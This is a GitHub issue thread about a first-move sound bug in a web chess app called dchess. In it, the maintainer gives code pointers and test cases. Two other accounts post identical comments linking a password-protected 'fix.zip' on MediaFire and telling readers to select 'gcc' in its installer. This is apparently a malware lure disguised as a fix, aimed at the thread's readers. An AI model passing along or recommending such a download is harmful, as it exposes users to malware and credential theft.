### ISSUE TITLE
Issues with sound of first move on load

### ISSUE THREAD

**Issue by aashutoshrathi** [stackrlabs/dchess#10]
## Description

Right now, to avoid issues with unnecessary sound on the first load, a check has been in place, which removes the sound of the first move overall. This needs to be handled in better way

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aashutoshrathi** [comment]
Impacts due to https://github.com/stackrlabs/dchess/blob/a5737671a53eb017007fa7b4d253652e432643a1/game/src/app/game/%5Bslug%5D/page.tsx#L82

Things to test:
- The player loads the page for the first while the other player makes some moves.
- A watcher just tuning into the game, shouldn't hear any extra or random sounds.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aashutoshrathi** [comment]
ah! not fixed, open a game from watcher, you'll randomly hear sound of last move

**Comment by aashutoshrathi** [comment]
Seems like fixed now
